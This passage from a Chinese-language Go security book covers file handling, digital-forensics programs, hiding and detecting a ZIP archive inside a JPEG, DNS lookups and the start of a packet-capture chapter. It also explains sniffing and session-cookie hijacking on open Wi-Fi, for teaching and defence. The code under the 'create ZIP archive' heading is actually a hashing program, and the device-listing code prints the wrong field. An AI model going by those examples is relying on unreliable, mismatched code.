   gzipReader, err := gzip.NewReader(gzipFile) 
   if err != nil { 
      log.Fatal(err) 
   } 
   defer gzipReader.Close() 

   // Uncompress to a writer. We'll use a file writer 
   outfileWriter, err := os.Create("unzipped.txt") 
   if err != nil { 
      log.Fatal(err) 
   } 
   defer outfileWriter.Close() 

   // Copy contents of gzipped file to output file 
   _, err = io.Copy(outfileWriter, gzipReader) 
   if err != nil { 
      log.Fatal(err) 
   } 
} 

在结束关于文件处理的这一章之前,让我们看两个可能有用的实际示例。当您不想创建永久文件但需要一个文件进行操作时,临时文件和目录是有用的。此外,通过互联网下载文件是获取文件的常见方式。下面的示例演示了这些操作。

创建临时文件和目录

ioutil包提供了两个函数:TempDir()TempFile()。调用者有责任在完成后删除临时项目。这些函数提供的唯一好处是,您可以将空字符串传递给目录,它将自动在系统的默认临时文件夹(在 Linux 上为/tmp)中创建该项目,因为os.TempDir()函数将返回默认的系统临时目录:

package main 

import ( 
   "fmt" 
   "io/ioutil" 
   "log" 
   "os" 
) 

func main() { 
   // Create a temp dir in the system default temp folder 
   tempDirPath, err := ioutil.TempDir("", "myTempDir") 
   if err != nil { 
      log.Fatal(err) 
   } 
   fmt.Println("Temp dir created:", tempDirPath) 

   // Create a file in new temp directory 
   tempFile, err := ioutil.TempFile(tempDirPath, "myTempFile.txt") 
   if err != nil { 
      log.Fatal(err) 
   } 
   fmt.Println("Temp file created:", tempFile.Name()) 

   // ... do something with temp file/dir ... 

   // Close file 
   err = tempFile.Close() 
   if err != nil { 
      log.Fatal(err) 
   } 

   // Delete the resources we created 
   err = os.Remove(tempFile.Name()) 
   if err != nil { 
      log.Fatal(err) 
   } 
   err = os.Remove(tempDirPath) 
   if err != nil { 
      log.Fatal(err) 
   } 
}

通过 HTTP 下载文件

现代计算中的常见任务是通过 HTTP 协议下载文件。以下示例显示了如何快速将特定 URL 下载到文件中。

其他常见的工具包括curlwget

package main 

import ( 
   "io" 
   "log" 
   "net/http" 
   "os" 
) 

func main() { 
   // Create output file 
   newFile, err := os.Create("devdungeon.html") 
   if err != nil { 
      log.Fatal(err) 
   } 
   defer newFile.Close() 

   // HTTP GET request devdungeon.com 
   url := "http://www.devdungeon.com/archive" 
   response, err := http.Get(url) 
   defer response.Body.Close() 

   // Write bytes from HTTP response to file. 
   // response.Body satisfies the reader interface. 
   // newFile satisfies the writer interface. 
   // That allows us to use io.Copy which accepts 
   // any type that implements reader and writer interface 
   numBytesWritten, err := io.Copy(newFile, response.Body) 
   if err != nil { 
      log.Fatal(err) 
   } 
   log.Printf("Downloaded %d byte file.\n", numBytesWritten) 
} 

总结

阅读完本章后,您现在应该熟悉了一些与文件交互的不同方式,并且可以轻松执行基本操作。目标不是要记住所有这些函数名,而是要意识到有哪些工具可用。如果您需要示例代码,本章可以用作参考,但我鼓励您创建一个类似这样的代码库。

有用的文件函数分布在多个包中。os包仅包含与文件的基本操作,如打开、关闭和简单读取。io包提供了可以在读取器和写入器接口上使用的函数,比os包更高级。ioutil包提供了更高级别的便利函数,用于处理文件。

在下一章中,我们将涵盖取证的主题。它将涵盖诸如寻找异常大或最近修改的文件之类的内容。除了文件取证,我们还将涵盖一些网络取证调查的主题,即查找主机名、IP 和主机的 MX 记录。取证章节还涵盖了隐写术的基本示例,展示了如何在图像中隐藏数据以及如何在图像中查找隐藏的数据。

第四章:取证

取证是收集证据以侦测犯罪。数字取证简单地指寻找数字证据,包括定位可能包含相关信息的异常文件,搜索隐藏数据,弄清楚文件最后修改时间,弄清楚谁发送了电子邮件,对文件进行散列,收集有关攻击 IP 的信息,或者捕获网络通信。

除了取证,本章还将涵盖隐写术的基本示例——将存档隐藏在图像中。隐写术是一种用来隐藏信息在其他信息中的技巧,使其不容易被发现。

散列,虽然与取证相关,但在《密码学》第六章中有所涵盖,数据包捕获则在第五章中有所涵盖,《数据包捕获和注入》。您将在本书的所有章节中找到对取证调查员有用的示例。

在本章中,您将学习以下主题:

  • 文件取证

  • 获取基本文件信息

  • 查找大文件

  • 查找最近更改的文件

  • 读取磁盘的引导扇区

  • 网络取证

  • 查找主机名和 IP 地址

  • 查找 MX 邮件记录

  • 查找主机的名称服务器

  • 隐写术

  • 在图像中隐藏存档

  • 检测图像中隐藏的存档

  • 生成随机图像

  • 创建 ZIP 存档

文件

文件取证很重要,因为攻击者可能留下痕迹,需要在进行更多更改或丢失任何信息之前收集证据。这包括确定谁拥有文件,它上次更改是什么时候,谁可以访问它,以及查看文件中是否有任何隐藏数据。

获取文件信息

让我们从简单的事情开始。这个程序将打印有关文件的信息,即最后修改时间,所有者是谁,它有多少字节,以及它的权限是什么。这也将作为一个很好的测试,以确保您的 Go 开发环境设置正确。

如果调查员发现了异常文件,首先要做的是检查所有基本元数据。这将提供有关文件所有者、哪些组可以访问它、最后修改时间、它是否是可执行文件以及它有多大的信息。所有这些信息都有潜在的用途。

我们将使用的主要函数是os.Stat()。这将返回一个FileInfo结构,我们将打印出来。我们必须在开始时导入os包以调用os.Stat()。从os.Stat()返回两个变量,这与许多只允许一个返回变量的语言不同。您可以使用下划线(_)符号代替变量名来忽略返回变量,例如您想要忽略的错误。

我们导入的fmt(格式)包包含典型的打印函数,如fmt.Println()fmt.Printf()log包包含log.Printf()log.Println()fmtlog之间的区别在于log在消息之前打印出时间戳,并且它是线程安全的。

log包有一个fmt中没有的函数,那就是log.Fatal(),它在打印后立即调用os.Exit(1)log.Fatal()函数对处理某些错误条件很有用,通过打印错误并退出。如果您想要干净的输出并具有完全控制,请使用fmt print函数。如果每条消息上都有时间戳会很有用,请使用log包的打印函数。在收集取证线索时,记录您执行每个操作的时间很重要。

在这个示例中,变量在main函数之前的自己的部分中定义。这个范围内的变量对整个包都是可用的。这意味着每个函数都在同一个文件中,其他文件与相同的包声明在同一个目录中。定义变量的这种方法只是为了表明在 Go 中是可能的。这是 Pascal 对语言的影响之一,还有:=运算符。在后续示例中,为了节省空间,我们将利用声明和赋值运算符或:=符号。这在编写代码时很方便,因为你不必先声明变量类型。它会在编译时推断数据类型。然而,在阅读源代码时,显式声明变量类型可以帮助读者浏览代码。我们也可以将整个var声明放在main函数内部以进一步限制范围:

package main

import (
   "fmt"
   "log"
   "os"
)

var (
   fileInfo os.FileInfo
   err error
)

func main() {
   // Stat returns file info. It will return
   // an error if there is no file.
   fileInfo, err = os.Stat("test.txt")
   if err != nil {
      log.Fatal(err)
   }
   fmt.Println("File name:", fileInfo.Name())
   fmt.Println("Size in bytes:", fileInfo.Size())
   fmt.Println("Permissions:", fileInfo.Mode())
   fmt.Println("Last modified:", fileInfo.ModTime())
   fmt.Println("Is Directory: ", fileInfo.IsDir())
   fmt.Printf("System interface type: %T\n", fileInfo.Sys())
   fmt.Printf("System info: %+v\n\n", fileInfo.Sys())
}

查找最大的文件

在调查时,大文件总是主要嫌疑对象。大型数据库转储、密码转储、彩虹表、信用卡缓存、窃取的知识产权和其他数据通常存储在一个大型存档中,如果你有合适的工具,很容易发现。此外,找到异常大的图像或视频文件也会很有帮助,因为它们可能包含了隐写信息。隐写术在本章中进一步介绍。

该程序将在一个目录和所有子目录中搜索所有文件并按文件大小进行排序。我们将使用ioutil.ReadDir()来探索初始目录,以获取os.FileInfo结构的内容切片。要检查文件是否为目录,我们将使用os.IsDir()。然后,我们将创建一个名为FileNode的自定义数据结构来存储我们需要的信息。我们使用链表来存储文件信息。在将元素插入列表之前,我们将遍历它以找到正确的位置,以便保持列表正确排序。请注意,在类似/的目录上运行程序可能需要很长时间。尝试更具体的目录,比如你的home文件夹:

package main

import (
   "container/list"
   "fmt"
   "io/ioutil"
   "log"
   "os"
   "path/filepath"
)

type FileNode struct {
   FullPath string
   Info os.FileInfo
}

func insertSorted(fileList *list.List, fileNode FileNode) {
   if fileList.Len() == 0 { 
      // If list is empty, just insert and return
      fileList.PushFront(fileNode)
      return
   }

   for element := fileList.Front(); element != nil; element =    
      element.Next() {
      if fileNode.Info.Size() < element.Value.(FileNode).Info.Size()       
      {
         fileList.InsertBefore(fileNode, element)
         return
      }
   }
   fileList.PushBack(fileNode)
}

func getFilesInDirRecursivelyBySize(fileList *list.List, path string) {
   dirFiles, err := ioutil.ReadDir(path)
   if err != nil {
      log.Println("Error reading directory: " + err.Error())
   }

   for _, dirFile := range dirFiles {
      fullpath := filepath.Join(path, dirFile.Name())
      if dirFile.IsDir() {
         getFilesInDirRecursivelyBySize(
            fileList,
            filepath.Join(path, dirFile.Name()),
         )
      } else if dirFile.Mode().IsRegular() {
         insertSorted(
            fileList,
            FileNode{FullPath: fullpath, Info: dirFile},
         )
      }
   }
}

func main() {
   fileList := list.New()
   getFilesInDirRecursivelyBySize(fileList, "/home")

   for element := fileList.Front(); element != nil; element =   
      element.Next() {
      fmt.Printf("%d ", element.Value.(FileNode).Info.Size())
      fmt.Printf("%s\n", element.Value.(FileNode).FullPath)
   }
}

查找最近修改过的文件

在对受害者机器进行取证时,你可以做的第一件事之一是查找最近修改过的文件。这可能会给你一些线索,比如攻击者在哪里寻找,他们修改了什么设置,或者他们的动机是什么。

然而,如果调查人员正在查看攻击者的机器,那么目标略有不同。最近访问的文件可能会给出一些线索,比如他们用来攻击的工具,他们可能隐藏数据的地方,或者他们使用的软件。

以下示例将搜索一个目录和子目录,找到所有文件并按最后修改时间进行排序。这个示例非常类似于前一个示例,只是排序是通过使用time.Time.Before()函数比较时间戳来完成的:

package main

import (
   "container/list"
   "fmt"
   "io/ioutil"
   "log"
   "os"
   "path/filepath"
)

type FileNode struct {
   FullPath string
   Info os.FileInfo
}

func insertSorted(fileList *list.List, fileNode FileNode) {
   if fileList.Len() == 0 { 
      // If list is empty, just insert and return
      fileList.PushFront(fileNode)
      return
   }

   for element := fileList.Front(); element != nil; element = 
      element.Next() {
      if fileNode.Info.ModTime().Before(element.Value.
        (FileNode).Info.ModTime()) {
            fileList.InsertBefore(fileNode, element)
            return
        }
    }

    fileList.PushBack(fileNode)
}

func GetFilesInDirRecursivelyBySize(fileList *list.List, path string) {
    dirFiles, err := ioutil.ReadDir(path)
    if err != nil {
        log.Println("Error reading directory: " + err.Error())
    }

    for _, dirFile := range dirFiles {
        fullpath := filepath.Join(path, dirFile.Name())
        if dirFile.IsDir() {
            GetFilesInDirRecursivelyBySize(
            fileList,
            filepath.Join(path, dirFile.Name()),
            )
        } else if dirFile.Mode().IsRegular() {
           insertSorted(
              fileList,
              FileNode{FullPath: fullpath, Info: dirFile},
           )
        }
    }
}

func main() {
    fileList := list.New()
    GetFilesInDirRecursivelyBySize(fileList, "/")

    for element := fileList.Front(); element != nil; element =    
       element.Next() {
        fmt.Print(element.Value.(FileNode).Info.ModTime())
        fmt.Printf("%s\n", element.Value.(FileNode).FullPath)
    }
}

读取引导扇区

该程序将读取磁盘的前 512 个字节,并将结果打印为十进制值、十六进制和字符串。io.ReadFull()函数类似于普通读取,但它确保你提供的数据字节片段完全填充。如果文件中的字节数不足以填充字节片段,则返回错误。

这个程序的一个实际用途是检查机器的引导扇区是否已被修改。Rootkits 和恶意软件可能通过修改引导扇区来劫持引导过程。您可以手动检查它是否有任何奇怪的东西,或者与已知的良好版本进行比较。也许可以比较机器的备份映像或新安装,看看是否有任何变化。

请注意,您可以在技术上传递任何文件名,而不是特定的磁盘,因为在 Linux 中,一切都被视为文件。如果直接传递设备的名称,例如/dev/sda,它将读取磁盘的前512个字节,即引导扇区。主要磁盘设备通常是/dev/sda,但也可能是/dev/sdb/dev/sdc。使用mountdf工具获取有关磁盘名称的更多信息。您需要以sudo身份运行应用程序,以便具有直接读取磁盘设备的权限。

有关文件、输入和输出的更多信息,请查看osbufioio包,如下面的代码块所示:

package main

// Device is typically /dev/sda but may also be /dev/sdb, /dev/sdc
// Use mount, or df -h to get info on which drives are being used
// You will need sudo to access some disks at this level

import (
   "io"
   "log"
   "os"
)

func main() {
   path := "/dev/sda"
   log.Println("[+] Reading boot sector of " + path)

   file, err := os.Open(path)
   if err != nil {
      log.Fatal("Error: " + err.Error())
   }

   // The file.Read() function will read a tiny file in to a large
   // byte slice, but io.ReadFull() will return an
   // error if the file is smaller than the byte slice.
   byteSlice := make([]byte, 512)
   // ReadFull Will error if 512 bytes not available to read
   numBytesRead, err := io.ReadFull(file, byteSlice)
   if err != nil {
      log.Fatal("Error reading 512 bytes from file. " + err.Error())
   }

   log.Printf("Bytes read: %d\n\n", numBytesRead)
   log.Printf("Data as decimal:\n%d\n\n", byteSlice)
   log.Printf("Data as hex:\n%x\n\n", byteSlice)
   log.Printf("Data as string:\n%s\n\n", byteSlice)
}

隐写术

隐写术是将消息隐藏在非机密消息中的做法。它不应与速记术混淆,速记术是指像法庭记录员一样记录口述的话语的做法。隐写术在历史上已经存在很长时间,一个老式的例子是在服装的缝纫中缝入摩尔斯电码消息。

在数字世界中,人们可以将任何类型的二进制数据隐藏在图像、音频或视频文件中。原始文件的质量可能会受到这一过程的影响。一些图像可以完全保持其原始完整性,但它们在形式上隐藏了额外的数据,如.zip.rar存档。一些隐写术算法很复杂,将原始二进制数据隐藏在每个字节的最低位中,只轻微降低原始质量。其他隐写术算法更简单,只是将图像文件和存档合并成一个文件。我们将看看如何将存档隐藏在图像中,以及如何检测隐藏的存档。

生成具有随机噪声的图像

该程序将创建一个 JPEG 图像,其中每个像素都设置为随机颜色。这是一个简单的程序,因此我们只有一个可用的 jpeg 图像可供使用。Go 标准库配备了jpeggifpng包。所有不同类型的图像的接口都是相同的,因此从jpeg切换到gifpng包非常容易:

package main

import (
   "image"
   "image/jpeg"
   "log"
   "math/rand"
   "os"
)

func main() {
   // 100x200 pixels
   myImage := image.NewRGBA(image.Rect(0, 0, 100, 200))

   for p := 0; p < 100*200; p++ {
      pixelOffset := 4 * p
      myImage.Pix[0+pixelOffset] = uint8(rand.Intn(256)) // Red
      myImage.Pix[1+pixelOffset] = uint8(rand.Intn(256)) // Green
      myImage.Pix[2+pixelOffset] = uint8(rand.Intn(256)) // Blue
      myImage.Pix[3+pixelOffset] = 255 // Alpha
   }

   outputFile, err := os.Create("test.jpg")
   if err != nil {
      log.Fatal(err)
   }

   jpeg.Encode(outputFile, myImage, nil)

   err = outputFile.Close()
   if err != nil {
      log.Fatal(err)
   }
}

创建 ZIP 存档

该程序将创建一个 ZIP 存档,以便我们在隐写术实验中使用。Go 标准库有一个zip包,但它也支持tar包的 TAR 存档。此示例生成一个包含两个文件的 ZIP 文件:test.txttest2.txt。为了保持简单,每个文件的内容都被硬编码为源代码中的字符串:

package main

import (
   "crypto/md5"
   "crypto/sha1"
   "crypto/sha256"
   "crypto/sha512"
   "fmt"
   "io/ioutil"
   "log"
   "os"
)

func printUsage() {
   fmt.Println("Usage: " + os.Args[0] + " <filepath>")
   fmt.Println("Example: " + os.Args[0] + " document.txt")
}

func checkArgs() string {
   if len(os.Args) < 2 {
      printUsage()
      os.Exit(1)
   }
   return os.Args[1]
}

func main() {
   filename := checkArgs()

   // Get bytes from file
   data, err := ioutil.ReadFile(filename)
   if err != nil {
      log.Fatal(err)
   }

   // Hash the file and output results
   fmt.Printf("Md5: %x\n\n", md5.Sum(data))
   fmt.Printf("Sha1: %x\n\n", sha1.Sum(data))
   fmt.Printf("Sha256: %x\n\n", sha256.Sum256(data))
   fmt.Printf("Sha512: %x\n\n", sha512.Sum512(data))
}

创建隐写图像存档

现在我们有了一张图像和一个 ZIP 存档,我们可以将它们组合在一起,将存档“隐藏”在图像中。这可能是最原始的隐写术形式。更高级的方法是逐字节拆分文件,将信息存储在图像的低位中,使用特殊程序从图像中提取数据,然后重建原始数据。这个例子很好,因为我们可以很容易地测试和验证它是否仍然作为图像加载,并且仍然像 ZIP 存档一样运行。

以下示例将采用 JPEG 图像和 ZIP 存档,并将它们组合在一起创建一个隐藏的存档。文件将保留.jpg扩展名,并且仍然可以像正常图像一样运行和查看。但是,该文件仍然可以作为 ZIP 存档工作。您可以解压缩.jpg文件,存档文件将被提取出来:

package main

import (
   "io"
   "log"
   "os"
)

func main() {
   // Open original file
   firstFile, err := os.Open("test.jpg")
   if err != nil {
      log.Fatal(err)
   }
   defer firstFile.Close()

   // Second file
   secondFile, err := os.Open("test.zip")
   if err != nil {
      log.Fatal(err)
   }
   defer secondFile.Close()

   // New file for output
   newFile, err := os.Create("stego_image.jpg")
   if err != nil {
      log.Fatal(err)
   }
   defer newFile.Close()

   // Copy the bytes to destination from source
   _, err = io.Copy(newFile, firstFile)
   if err != nil {
      log.Fatal(err)
   }
   _, err = io.Copy(newFile, secondFile)
   if err != nil {
      log.Fatal(err)
   }
}

在 JPEG 图像中检测 ZIP 存档

如果使用前面示例中的技术隐藏数据,则可以通过在图像中搜索 ZIP 文件签名来检测数据。文件可能具有.jpg扩展名,并且在照片查看器中仍然可以正确加载,但它可能仍然在文件中存储有 ZIP 存档。以下程序将搜索文件并查找 ZIP 文件签名。我们可以对前面示例中创建的文件运行它:

package main

import (
   "bufio"
   "bytes"
   "log"
   "os"
)

func main() {
   // Zip signature is "\x50\x4b\x03\x04"
   filename := "stego_image.jpg"
   file, err := os.Open(filename)
   if err != nil {
      log.Fatal(err)
   }
   bufferedReader := bufio.NewReader(file)

   fileStat, _ := file.Stat()
   // 0 is being cast to an int64 to force i to be initialized as
   // int64 because filestat.Size() returns an int64 and must be
   // compared against the same type
   for i := int64(0); i < fileStat.Size(); i++ {
      myByte, err := bufferedReader.ReadByte()
      if err != nil {
         log.Fatal(err)
      }

      if myByte == '\x50' { 
         // First byte match. Check the next 3 bytes
         byteSlice := make([]byte, 3)
         // Get bytes without advancing pointer with Peek
         byteSlice, err = bufferedReader.Peek(3)
         if err != nil {
            log.Fatal(err)
         }

         if bytes.Equal(byteSlice, []byte{'\x4b', '\x03', '\x04'}) {
            log.Printf("Found zip signature at byte %d.", i)
         }
      }
   }
}

网络

有时,日志中会出现奇怪的 IP 地址,您需要查找更多信息,或者可能有一个您需要根据 IP 地址定位的域名。这些示例演示了收集有关主机的信息。数据包捕获也是网络取证调查的一个重要部分,但是关于数据包捕获还有很多要说,因此第五章,数据包捕获和注入专门讨论了数据包捕获和注入。

从 IP 地址查找主机名

该程序将接受一个 IP 地址并找出主机名。net.parseIP()函数用于验证提供的 IP 地址,net.LookupAddr()完成了查找主机名的真正工作。

默认情况下,使用纯 Go 解析器。可以通过设置GODEBUG环境变量的netdns值来覆盖解析器。将GODEBUG的值设置为gocgo。您可以在 Linux 中使用以下 shell 命令来执行此操作:

export GODEBUG=netdns=go # force pure Go resolver (Default)
export GODEBUG=netdns=cgo # force cgo resolver

以下是程序的代码:

package main

import (
   "fmt"
   "log"
   "net"
   "os"
)

func main() {
   if len(os.Args) != 2 {
      log.Fatal("No IP address argument provided.")
   }
   arg := os.Args[1]

   // Parse the IP for validation
   ip := net.ParseIP(arg)
   if ip == nil {
      log.Fatal("Valid IP not detected. Value provided: " + arg)
   }

   fmt.Println("Looking up hostnames for IP address: " + arg)
   hostnames, err := net.LookupAddr(ip.String())
   if err != nil {
      log.Fatal(err)
   }
   for _, hostnames := range hostnames {
      fmt.Println(hostnames)
   }
}

从主机名查找 IP 地址

以下示例接受主机名并返回 IP 地址。它与先前的示例非常相似,但是顺序相反。net.LookupHost()函数完成了大部分工作:

package main

import (
   "fmt"
   "log"
   "net"
   "os"
)

func main() {
   if len(os.Args) != 2 {
      log.Fatal("No hostname argument provided.")
   }
   arg := os.Args[1]

   fmt.Println("Looking up IP addresses for hostname: " + arg)

   ips, err := net.LookupHost(arg)
   if err != nil {
      log.Fatal(err)
   }
   for _, ip := range ips {
      fmt.Println(ip)
   }
}

查找 MX 记录

该程序将接受一个域名并返回 MX 记录。MX 记录,或邮件交换记录,是指向邮件服务器的 DNS 记录。例如,www.devdungeon.com/的 MX 服务器是mail.devdungeon.comnet.LookupMX()函数执行此查找并返回net.MX结构的切片:

package main

import (
   "fmt"
   "log"
   "net"
   "os"
)

func main() {
   if len(os.Args) != 2 {
      log.Fatal("No domain name argument provided")
   }
   arg := os.Args[1]

   fmt.Println("Looking up MX records for " + arg)

   mxRecords, err := net.LookupMX(arg)
   if err != nil {
      log.Fatal(err)
   }
   for _, mxRecord := range mxRecords {
      fmt.Printf("Host: %s\tPreference: %d\n", mxRecord.Host,   
         mxRecord.Pref)
   }
}

查找主机名的域名服务器

该程序将查找与给定主机名关联的域名服务器。这里的主要功能是net.LookupNS()

package main

import (
   "fmt"
   "log"
   "net"
   "os"
)

func main() {
   if len(os.Args) != 2 {
      log.Fatal("No domain name argument provided")
   }
   arg := os.Args[1]

   fmt.Println("Looking up nameservers for " + arg)

   nameservers, err := net.LookupNS(arg)
   if err != nil {
      log.Fatal(err)
   }
   for _, nameserver := range nameservers {
      fmt.Println(nameserver.Host)
   }
}

总结

阅读完本章后,您现在应该对数字取证调查的目标有基本的了解。关于这些主题中的每一个都可以说更多,取证是一门需要自己的书籍,更不用说一章了。

将您已阅读的示例作为起点,思考一下如果您收到了一台被入侵的机器,您将寻找什么样的信息,以及您的目标是弄清楚攻击者是如何进入的,发生的时间,他们访问了什么,他们修改了什么,他们的动机是什么,有多少数据被外泄,以及您可以找到的任何其他信息,以确定行动者是谁或在系统上采取了什么行动。

熟练的对手将尽一切努力掩盖自己的踪迹,避免取证检测。因此,重要的是要及时了解正在使用的最新工具和趋势,以便在调查时知道要寻找的技巧和线索。

这些示例可以进行扩展,自动化,并集成到执行更大规模的取证搜索的其他应用程序中。借助 Go 的可扩展性,可以轻松地创建工具,以有效的方式搜索整个文件系统或网络。

在下一章中,我们将学习使用 Go 进行数据包捕获。我们将从基础知识开始,例如获取网络设备列表和将网络流量转储到文件中。然后,我们将讨论使用过滤器查找特定的网络流量。此外,我们将探讨使用 Go 接口解码和检查数据包的更高级技术。我们还将涵盖创建自定义数据包层以及从网络卡发送数据包的技术,从而允许您发送任意数据包。

第五章:数据包捕获和注入

数据包捕获是监视通过网络传输的原始流量的过程。这适用于有线以太网和无线网络设备。在数据包捕获方面,tcpdumplibpcap包是标准。它们是在 20 世纪 80 年代编写的,至今仍在使用。gopacket包不仅包装了 C 库,还添加了 Go 抽象层,使其更符合 Go 的习惯用法并且更实用。

pcap库允许您收集有关网络设备的信息,从网络中读取数据包,将流量存储在.pcap文件中,根据多种条件过滤流量,或伪造自定义数据包并通过网络设备发送它们。对于pcap库,过滤是使用伯克利数据包过滤器BPF)完成的。

数据包捕获有无数种用途。它可以用于设置蜜罐并监视接收到的流量类型。它可以帮助进行取证调查,以确定哪些主机表现恶意,哪些主机被利用。它可以帮助识别网络中的瓶颈。它也可以被恶意使用来从无线网络中窃取信息,执行数据包扫描,模糊测试,ARP 欺骗和其他类型的攻击。

这些示例需要一个非 Go 依赖项和一个libpcap包,因此在运行时可能会更具挑战性。如果您尚未将 Linux 作为主要桌面系统使用,我强烈建议您在虚拟机中使用 Ubuntu 或其他 Linux 发行版以获得最佳结果。

Tcpdump 是由libpcap的作者编写的应用程序。Tcpdump 提供了一个用于捕获数据包的命令行实用程序。这些示例将允许您复制tcpdump包的功能,并将其嵌入到其他应用程序中。其中一些示例与tcpdump的现有功能非常相似,如果适用,将提供tcpdump的示例用法。由于gopackettcpdump都依赖于相同的底层libpcap包,因此它们之间的文件格式是兼容的。您可以使用tcpdump捕获文件,并使用gopacket读取它们,也可以使用gopacket捕获数据包,并使用任何使用libpcap的应用程序读取它们,例如 Wireshark。

gopacket包的官方文档可在godoc.org/github.com/google/gopacket找到。

先决条件

在运行这些示例之前,您需要安装libpcap。此外,我们还必须使用第三方 Go 包。幸运的是,这个包是由 Google 提供的,是一个可信赖的来源。Go 的get功能将下载并安装远程包。Git 也将需要用于使go get正常工作。

安装 libpcap 和 Git

libpcap包依赖项在大多数系统上都没有预安装,并且安装过程对每个操作系统都是不同的。在这里,我们将介绍 Ubuntu、Windows 和 macOS 上安装libpcapgit的步骤。我强烈建议您使用 Ubuntu 或其他 Linux 发行版以获得最佳结果。没有libpcapgopacket将无法正常工作,而git是获取gopacket依赖项所必需的。

在 Ubuntu 上安装 libpcap

在 Ubuntu 中,默认情况下已经安装了libpcap-0.8。但是,要安装gopacket库,你还需要开发包中的头文件。你可以通过libpcap-dev包安装头文件。我们还将安装git,因为在安装gopacket时稍后需要运行go get命令。

sudo apt-get install git libpcap-dev

在 Windows 上安装 libpcap

Windows 是最棘手的,也是出现最多问题的地方。Windows 实现的支持并不是很好,你的使用体验可能会有所不同。WinPcap 与 libpcap 兼容,这些示例中使用的源代码也可以直接在 Windows 上运行而无需修改。在 Windows 上运行时唯一显著的区别是网络设备的命名。

WinPcap 安装程序可从www.winpcap.org/获取,并且是一个必需的组件。如果需要开发人员包,可以在www.winpcap.org/devel.htm获取,其中包含用 C 编写的包含文件和示例程序。对于大多数情况,您不需要开发人员包。Git 可以从git-scm.com/download/win获取。您还需要 MinGW 作为编译器,可以从www.mingw.org获取。您需要确保 32 位和 64 位设置匹配。您可以设置GOARCH=386GOARCH=amd64环境变量来在 32 位和 64 位之间切换。

在 macOS 上安装 libpcap

在 macOS 中,libpcap已经安装。您还需要 Git,可以通过 Homebrew 在brew.sh获取,或者通过 Git 软件包安装程序在git-scm.com/downloads获取。

安装 gopacket

在满足libpcapgit软件包的要求后,您可以从 GitHub 获取gopacket软件包:

go get github.com/google/gopacket  

权限问题

在 Linux 和 Mac 环境中执行程序时,可能会遇到访问网络设备时的权限问题。使用sudo来提升权限或切换用户到root来运行示例,但这并不推荐。

获取网络设备列表

pcap库的一部分包括一个用于获取网络设备列表的函数。

此程序将简单地获取网络设备列表并列出它们的信息。在 Linux 中,常见的默认设备名称是eth0wlan0。在 Mac 上,是en0。在 Windows 上,名称不可读,因为它们更长并代表唯一的 ID。您可以使用设备名称作为字符串来标识以后示例中要捕获的设备。如果您没有看到确切设备的列表,可能需要以管理员权限运行示例(例如sudo)。

列出设备的等效tcpdump命令如下:

tcpdump -D

或者,您可以使用以下命令:

tcpdump --list-interfaces

您还可以使用ifconfigip等实用程序来获取您的网络设备的名称:

package main

import (
   "fmt"
   "log"
   "github.com/google/gopacket/pcap"
)

func main() {
   // Find all devices
   devices, err := pcap.FindAllDevs()
   if err != nil {
      log.Fatal(err)
   }

   // Print device information
   fmt.Println("Devices found:")
   for _, device := range devices {
      fmt.Println("\nName: ", device.Name)
      fmt.Println("Description: ", device.Description)
      fmt.Println("Devices addresses: ", device.Description)
      for _, address := range device.Addresses {
         fmt.Println("- IP address: ", address.IP)
         fmt.Println("- Subnet mask: ", address.Netmask)
      }
   }
}

捕获数据包

以下程序演示了捕获数据包的基础知识。设备名称以字符串形式传递。如果您不知道设备名称,可以使用前面的示例来获取机器上可用设备的列表。如果您没有看到确切的设备名称列表,可能需要提升权限并使用sudo来运行程序。

混杂模式是一种选项,您可以启用它来监听并捕获并非发送给您设备的数据包。混杂模式在无线设备中尤其相关,因为无线网络设备实际上有能力捕获空中本来是发给其他接收者的数据包。

无线流量特别容易受到嗅探的影响,因为所有数据包都是通过空气广播而不是通过以太网传输,以太网需要物理访问才能拦截流量。提供没有加密的免费无线互联网在咖啡店和其他场所非常常见。这对客人来说很方便,但会使你的信息处于风险之中。如果场所提供加密的无线互联网,并不代表它自动更安全。如果密码被张贴在墙上,或者自由分发,那么任何有密码的人都可以解密无线流量。增加对客人无线网络的安全性的一种流行技术是使用捕获门户。捕获门户要求用户以某种方式进行身份验证,即使是作为访客,然后他们的会话被分割并使用单独的加密,这样其他人就无法解密它。

提供完全未加密流量的无线接入点必须小心使用。如果你连接到一个传递敏感信息的网站,请确保它使用 HTTPS,这样你和你访问的网站之间的数据就会被加密。VPN 连接也可以在未加密的通道上提供加密隧道。

一些网站是由不知情或疏忽的程序员构建的,他们在服务器上没有实现 SSL。一些网站只加密登录页面,以确保你的密码安全,但随后以明文传递会话 cookie。这意味着任何可以拦截无线流量的人都可以看到会话 cookie 并使用它来冒充受害者访问网站。网站将把攻击者视为受害者已登录。攻击者永远不会得知密码,但只要会话保持活动状态,他们就不需要密码。

一些网站的会话没有过期日期,它们会一直保持活动状态,直到明确退出登录。移动应用程序特别容易受到这种影响,因为用户很少退出并重新登录移动应用程序。关闭一个应用程序并重新打开它并不一定会创建一个新的会话。

这个例子将打开网络设备进行实时捕获,然后打印每个接收到的数据包的详细信息。程序将继续运行,直到使用Ctrl + C 杀死程序。

package main

import (
   "fmt"
   "github.com/google/gopacket"
   "github.com/google/gopacket/pcap"
   "log"
   "time"
)

var (
   device            = "eth0"
   snapshotLen int32 = 1024
   promiscuous       = false
   err         error
   timeout     = 30 * time.Second
   handle      *pcap.Handle
)

func main() {
   // Open device
   handle, err = pcap.OpenLive(device, snapshotLen, promiscuous,  
      timeout)
   if err != nil {
      log.Fatal(err)
   }
   defer handle.Close()

   // Use the handle as a packet source to process all packets
   packetSource := gopacket.NewPacketSource(handle, handle.LinkType())
   for packet := range packetSource.Packets() {
      // Process packet here
      fmt.Println(packet)
   }
}

使用过滤器捕获

以下程序演示了如何设置过滤器。过滤器使用 BPF 格式。如果你曾经使用过 Wireshark,你可能已经熟悉过滤器了。有许多可以逻辑组合的过滤选项。过滤器可以非常复杂,在网上有许多常见过滤器和巧妙技巧的速查表。以下是一些基本过滤器的示例,以便让你了解一些基本过滤器的想法:

  • host 192.168.0.123

  • dst net 192.168.0.0/24

  • port 22

  • not broadcast and not multicast

前面的一些过滤器应该是不言自明的。host过滤器将只显示发送到或从该主机的数据包。dst net过滤器将捕获发送到192.168.0.*地址的流量。port过滤器只监视端口22的流量。not broadcast and not multicast过滤器演示了如何否定和组合多个过滤器。过滤掉广播多播是有用的,因为它们往往会使捕获变得混乱。

一个基本捕获的等效tcpdump命令只需运行它并传递一个接口:

tcpdump -i eth0

如果你想传递过滤器,只需将它们作为命令行参数传递,就像这样:

tcpdump -i eth0 tcp port 80

